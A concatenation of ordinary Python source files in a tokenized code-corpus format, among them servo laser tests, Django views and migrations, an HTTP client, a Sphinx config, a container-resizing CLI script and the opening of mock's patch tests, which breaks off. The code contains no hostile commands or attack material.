<s> import unittest <EOL> from model import LaserModel <EOL> class LaserModelTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . servos = TestServos ( ) <EOL> self . model = LaserModel ( self . servos , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> def test_setxaxis_getxaxis ( self ) : <EOL> self . model . setXAxis ( <NUM_LIT:200> ) <EOL> self . assertEqual ( self . model . getXAxis ( ) , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT:200> ) <EOL> def test_setyaxis_getyaxis ( self ) : <EOL> self . model . setYAxis ( <NUM_LIT:200> ) <EOL> self . assertEqual ( self . model . getYAxis ( ) , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . servos . yaxis , <NUM_LIT:200> ) <EOL> def test_setxaxis_out_of_bounds_raises_valueerror ( self ) : <EOL> self . assertRaises ( ValueError , self . model . setXAxis , <NUM_LIT:10> ) <EOL> self . assertRaises ( ValueError , self . model . setXAxis , <NUM_LIT> ) <EOL> def test_setyaxis_out_of_bounds_raises_valueerror ( self ) : <EOL> self . assertRaises ( ValueError , self . model . setYAxis , <NUM_LIT:10> ) <EOL> self . assertRaises ( ValueError , self . model . setYAxis , <NUM_LIT> ) <EOL> def test_axis_defaults_to_400 ( self ) : <EOL> self . assertEqual ( self . model . getXAxis ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( self . model . getYAxis ( ) , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . 
yaxis , <NUM_LIT> ) <EOL> def test_setcalibration_getcalibration ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT:200> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:50> } , { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:50> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> tc , sc = self . model . getCalibration ( ) <EOL> self . assertEqual ( tc , targetCal ) <EOL> self . assertEqual ( sc , servoCal ) <EOL> def test_setcalibration_saves_calibration ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT:200> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:10> } , { '<STR_LIT:x>' : <NUM_LIT:50> , '<STR_LIT:y>' : <NUM_LIT:50> } , { '<STR_LIT:x>' : <NUM_LIT:10> , '<STR_LIT:y>' : <NUM_LIT:50> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> self . model = LaserModel ( self . servos , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> tc , sc = self . model . getCalibration ( ) <EOL> self . assertEqual ( tc , targetCal ) <EOL> self . 
assertEqual ( sc , servoCal ) <EOL> def test_target ( self ) : <EOL> targetCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> servoCal = [ { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } , { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT> } ] <EOL> self . model . setCalibration ( targetCal , servoCal ) <EOL> self . model . target ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . xaxis , <NUM_LIT> ) <EOL> self . assertEqual ( self . servos . yaxis , <NUM_LIT> ) <EOL> class TestServos ( object ) : <EOL> def __init__ ( self ) : <EOL> self . xaxis = <NUM_LIT:0> <EOL> self . yaxis = <NUM_LIT:0> <EOL> def setXAxis ( self , value ) : <EOL> self . xaxis = value <EOL> def setYAxis ( self , value ) : <EOL> self . yaxis = value <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> from api . view import ApiView <EOL> from popong_models . statement import Statement <EOL> class StatementApi ( ApiView ) : <EOL> model = Statement <EOL> kind_single = '<STR_LIT>' <EOL> kind_list = '<STR_LIT>' <EOL> def _search ( self ) : <EOL> return super ( StatementApi , self ) . _search ( fieldname = '<STR_LIT:content>' ) <EOL> def to_dict ( self , statement ) : <EOL> d = { <EOL> '<STR_LIT:id>' : statement . id , <EOL> '<STR_LIT>' : statement . meeting_id , <EOL> '<STR_LIT>' : statement . person_id , <EOL> '<STR_LIT>' : statement . sequence , <EOL> '<STR_LIT>' : statement . speaker , <EOL> '<STR_LIT:content>' : statement . content , <EOL> '<STR_LIT:date>' : statement . date , <EOL> '<STR_LIT:url>' : '<STR_LIT>' % ( statement . meeting_id , statement . id ) <EOL> } <EOL> return d </s>
<s> from setuptools import setup <EOL> import os <EOL> def read ( filename ) : <EOL> return open ( filename ) . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:ascii>' , '<STR_LIT>' , '<STR_LIT:text>' ] , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> scripts = [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:description>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT:start>' , self . gf ( '<STR_LIT>' ) ( db_index = True ) ) , <EOL> ( '<STR_LIT:end>' , self . gf ( '<STR_LIT>' ) ( db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , db_index = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . 
delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' 
: ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:end>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , 
'<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . contrib . sites . models import Site <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . shortcuts import render_to_response <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . template import RequestContext <EOL> from django . conf import settings <EOL> def current_site ( request ) : <EOL> return { '<STR_LIT>' : Site . objects . get_current ( ) } <EOL> def current_page ( request ) : <EOL> path = request . path <EOL> is_events = False <EOL> is_blog = False <EOL> is_profile = False <EOL> is_home = False <EOL> if path . startswith ( "<STR_LIT>" ) : <EOL> is_events = True <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> is_blog = True <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> is_profile = True <EOL> else : <EOL> is_home = True <EOL> return { '<STR_LIT>' : is_home , <EOL> '<STR_LIT>' : is_profile , <EOL> '<STR_LIT>' : is_blog , <EOL> '<STR_LIT>' : is_events } </s>
import requests
from requests.auth import HTTPBasicAuth
import urlparse
import urllib

BASE_URL = '<STR_LIT>'
SERIES_ENDPOINT = '<STR_LIT>'


def make_url_args(params):
    """Flatten *params* into a URL-encoded query string.

    Lists/tuples are repeated per element, dicts are expanded into
    composite keys, booleans become lowercase 'true'/'false', and
    None values are dropped entirely.
    """
    p = []
    for key, value in params.iteritems():
        if isinstance(value, (list, tuple)):
            for v in value:
                p.append((key, v))
        elif isinstance(value, dict):
            for k, v in value.items():
                p.append(('<STR_LIT>' % (key, k), v))
        elif isinstance(value, bool):
            # Serialize booleans the way the API expects: 'true'/'false'.
            p.append((key, str(value).lower()))
        elif value is None:
            # None means "not supplied" — omit the pair rather than send 'None'.
            continue
        else:
            p.append((key, str(value)))
    return urllib.urlencode(p).encode("<STR_LIT>")


class HTTPEndpoint(object):
    """Thin HTTP client wrapping a pooled requests session with basic auth."""

    def __init__(self, database_id, key, secret, base_url=BASE_URL):
        # Normalize the base URL so urljoin resolves relative paths correctly.
        if base_url.endswith('<STR_LIT:/>'):
            self.base_url = base_url
        else:
            self.base_url = base_url + '<STR_LIT:/>'
        self.database_id = database_id
        self.headers = {
            '<STR_LIT>': '<STR_LIT>' % "<STR_LIT>",
            '<STR_LIT>': '<STR_LIT>'
        }
        self.auth = HTTPBasicAuth(key, secret)
        # requests.session() is a deprecated alias; use the Session class.
        self.pool = requests.Session()
        for p in ['<STR_LIT>', '<STR_LIT>']:
            adapter = requests.adapters.HTTPAdapter()
            self.pool.mount(p, adapter)

    def _absolute(self, url):
        # Resolve *url* against the configured base URL (shared by all verbs).
        return urlparse.urljoin(self.base_url, url)

    def post(self, url, body):
        """POST *body* to *url* (relative to the base URL); return the response."""
        resp = self.pool.post(self._absolute(url), data=body, auth=self.auth)
        return resp

    def get(self, url):
        """GET *url* (relative to the base URL); return the response."""
        resp = self.pool.get(self._absolute(url), auth=self.auth)
        return resp

    def delete(self, url):
        """DELETE *url* (relative to the base URL); return the response."""
        resp = self.pool.delete(self._absolute(url), auth=self.auth)
        return resp

    def put(self, url, body):
        """PUT *body* to *url* (relative to the base URL); return the response."""
        resp = self.pool.put(self._absolute(url), data=body, auth=self.auth)
        return resp
<s> import sys <EOL> import os <EOL> from recommonmark . parser import CommonMarkParser <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> source_parsers = { <EOL> '<STR_LIT>' : CommonMarkParser , <EOL> } <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> author = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> language = None <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> todo_include_todos = False <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ author ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( master_doc , '<STR_LIT>' , '<STR_LIT>' , <EOL> author , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import inspect <EOL> from os . path import relpath , dirname <EOL> import tensorprob <EOL> def linkcode_resolve ( domain , info ) : <EOL> """<STR_LIT>""" <EOL> if domain != '<STR_LIT>' : <EOL> return None <EOL> modname = info [ '<STR_LIT>' ] <EOL> fullname = info [ '<STR_LIT>' ] <EOL> submod = sys . modules . get ( modname ) <EOL> if submod is None : <EOL> return None <EOL> obj = submod <EOL> for part in fullname . split ( '<STR_LIT:.>' ) : <EOL> try : <EOL> obj = getattr ( obj , part ) <EOL> except : <EOL> return None <EOL> try : <EOL> inspect . getsourcefile ( obj ) <EOL> except : <EOL> return None <EOL> try : <EOL> fn = inspect . getsourcefile ( obj ) <EOL> except : <EOL> fn = None <EOL> if not fn : <EOL> return None <EOL> try : <EOL> source , lineno = inspect . 
findsource ( obj ) <EOL> except : <EOL> lineno = None <EOL> if lineno : <EOL> linespec = "<STR_LIT>" % ( lineno + <NUM_LIT:1> ) <EOL> else : <EOL> linespec = "<STR_LIT>" <EOL> fn = relpath ( fn , start = dirname ( tensorprob . __file__ ) ) <EOL> return "<STR_LIT>" % ( <EOL> fn , linespec ) </s>
<s> import numpy as np <EOL> import tensorprob as tp <EOL> import scipy . stats as st <EOL> from numpy . testing import assert_array_almost_equal , assert_array_equal <EOL> def make_normal ( ) : <EOL> mu = tp . Parameter ( name = '<STR_LIT>' ) <EOL> sigma = tp . Parameter ( name = '<STR_LIT>' , lower = <NUM_LIT:0> ) <EOL> X = tp . Normal ( mu , sigma ) <EOL> return mu , sigma , X <EOL> def test_pdf ( ) : <EOL> with tp . Model ( ) as m : <EOL> mu , sigma , X = make_normal ( ) <EOL> m . observed ( X ) <EOL> xs = np . linspace ( - <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:100> ) <EOL> out1 = st . norm . pdf ( xs , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> m . initialize ( { <EOL> mu : <NUM_LIT:0> , <EOL> sigma : <NUM_LIT:1> <EOL> } ) <EOL> out2 = m . pdf ( xs ) <EOL> assert_array_almost_equal ( out1 , out2 , <NUM_LIT:16> ) </s>
<s> import json <EOL> import urllib <EOL> import urllib2 <EOL> import argparse <EOL> def get_terminal_details ( user_token , access_token , subdomain ) : <EOL> output = json . loads ( urllib2 . urlopen ( '<STR_LIT>' , <EOL> urllib . urlencode ( { <EOL> '<STR_LIT>' : user_token , <EOL> '<STR_LIT>' : access_token , <EOL> '<STR_LIT>' : subdomain , <EOL> } ) ) . read ( ) ) <EOL> return output <EOL> def set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) : <EOL> output = json . loads ( urllib2 . urlopen ( '<STR_LIT>' , <EOL> urllib . urlencode ( { <EOL> '<STR_LIT>' : user_token , <EOL> '<STR_LIT>' : access_token , <EOL> '<STR_LIT>' : container_key , <EOL> '<STR_LIT>' : cpu , <EOL> '<STR_LIT>' : ram , <EOL> '<STR_LIT>' : diskspace , <EOL> } ) ) . read ( ) ) <EOL> return output <EOL> def get_new_size ( cpu_size , action ) : <EOL> cpu_index = <NUM_LIT:0> <EOL> terminals = [ { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:50> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:100> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT:200> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } , <EOL> { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT> } ] <EOL> for index in range ( <NUM_LIT:0> , len ( terminals ) ) : <EOL> if str ( int ( cpu_size ) ) == str ( terminals [ index ] [ '<STR_LIT>' ] ) : <EOL> cpu_index = index <EOL> if action == '<STR_LIT>' : <EOL> return terminals [ ( cpu_index + <NUM_LIT:1> ) ] [ '<STR_LIT>' ] , terminals [ ( cpu_index + <NUM_LIT:1> ) ] [ '<STR_LIT>' ] <EOL> elif action == '<STR_LIT>' : <EOL> return terminals [ ( cpu_index - <NUM_LIT:1> ) ] [ '<STR_LIT>' ] , terminals [ ( cpu_index - <NUM_LIT:1> ) ] [ '<STR_LIT>' ] <EOL> def get_credentials ( utoken , atoken , credsfile ) : <EOL> if utoken is None 
and atoken is None : <EOL> try : <EOL> creds = json . load ( open ( credsfile , '<STR_LIT:r>' ) ) <EOL> utoken = creds [ '<STR_LIT>' ] <EOL> atoken = creds [ '<STR_LIT>' ] <EOL> except : <EOL> print "<STR_LIT>" , "<STR_LIT>" <EOL> exit ( <NUM_LIT> ) <EOL> elif ( utoken is not None and atoken is None ) or ( utoken is None and atoken is not None ) : <EOL> print "<STR_LIT>" <EOL> exit ( <NUM_LIT:1> ) <EOL> else : <EOL> with open ( credsfile , '<STR_LIT:w>' ) as cfile : <EOL> json . dump ( { '<STR_LIT>' : utoken , '<STR_LIT>' : atoken } , cfile ) <EOL> return utoken , atoken <EOL> def upsize_terminal ( cpu_size ) : <EOL> print "<STR_LIT>" <EOL> cpu , ram = get_new_size ( cpu_size , '<STR_LIT>' ) <EOL> container_key = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> diskspace = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) <EOL> def downsize_terminal ( cpu_size ) : <EOL> print "<STR_LIT>" <EOL> cpu , ram = get_new_size ( cpu_size , '<STR_LIT>' ) <EOL> container_key = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> diskspace = get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return set_terminal_size ( user_token , access_token , container_key , cpu , ram , diskspace ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( "<STR_LIT:action>" , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT:50> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = "<STR_LIT>" ) <EOL> parser . 
add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = None , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = None , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = str , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> subdomain = args . subdomain <EOL> user_token , access_token = get_credentials ( args . utoken , args . atoken , args . creds ) <EOL> if get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> cpu_size = float ( '<STR_LIT>' ) <EOL> else : <EOL> cpu_size = float ( get_terminal_details ( user_token , access_token , subdomain ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if args . action == '<STR_LIT>' : <EOL> if cpu_size <= args . maxsize : <EOL> upsize_terminal ( cpu_size ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> elif args . action == '<STR_LIT>' : <EOL> if cpu_size >= args . minsize : <EOL> downsize_terminal ( cpu_size ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print '<STR_LIT>' <EOL> exit ( <NUM_LIT:1> ) </s>
<s> import os <EOL> import sys <EOL> import six <EOL> import unittest2 as unittest <EOL> from mock . tests import support <EOL> from mock . tests . support import SomeClass , is_instance , callable <EOL> from mock import ( <EOL> NonCallableMock , CallableMixin , patch , sentinel , <EOL> MagicMock , Mock , NonCallableMagicMock , patch , <EOL> DEFAULT , call <EOL> ) <EOL> from mock . mock import _patch , _get_target <EOL> builtin_string = '<STR_LIT>' <EOL> if six . PY3 : <EOL> builtin_string = '<STR_LIT>' <EOL> unicode = str <EOL> PTModule = sys . modules [ __name__ ] <EOL> MODNAME = '<STR_LIT>' % __name__ <EOL> def _get_proxy ( obj , get_only = True ) : <EOL> class Proxy ( object ) : <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( obj , name ) <EOL> if not get_only : <EOL> def __setattr__ ( self , name , value ) : <EOL> setattr ( obj , name , value ) <EOL> def __delattr__ ( self , name ) : <EOL> delattr ( obj , name ) <EOL> Proxy . __setattr__ = __setattr__ <EOL> Proxy . __delattr__ = __delattr__ <EOL> return Proxy ( ) <EOL> something = sentinel . Something <EOL> something_else = sentinel . SomethingElse <EOL> class Foo ( object ) : <EOL> def __init__ ( self , a ) : <EOL> pass <EOL> def f ( self , a ) : <EOL> pass <EOL> def g ( self ) : <EOL> pass <EOL> foo = '<STR_LIT:bar>' <EOL> class Bar ( object ) : <EOL> def a ( self ) : <EOL> pass <EOL> foo_name = '<STR_LIT>' % __name__ <EOL> def function ( a , b = Foo ) : <EOL> pass <EOL> class Container ( object ) : <EOL> def __init__ ( self ) : <EOL> self . values = { } <EOL> def __getitem__ ( self , name ) : <EOL> return self . values [ name ] <EOL> def __setitem__ ( self , name , value ) : <EOL> self . values [ name ] = value <EOL> def __delitem__ ( self , name ) : <EOL> del self . values [ name ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . values ) <EOL> class PatchTest ( unittest . 
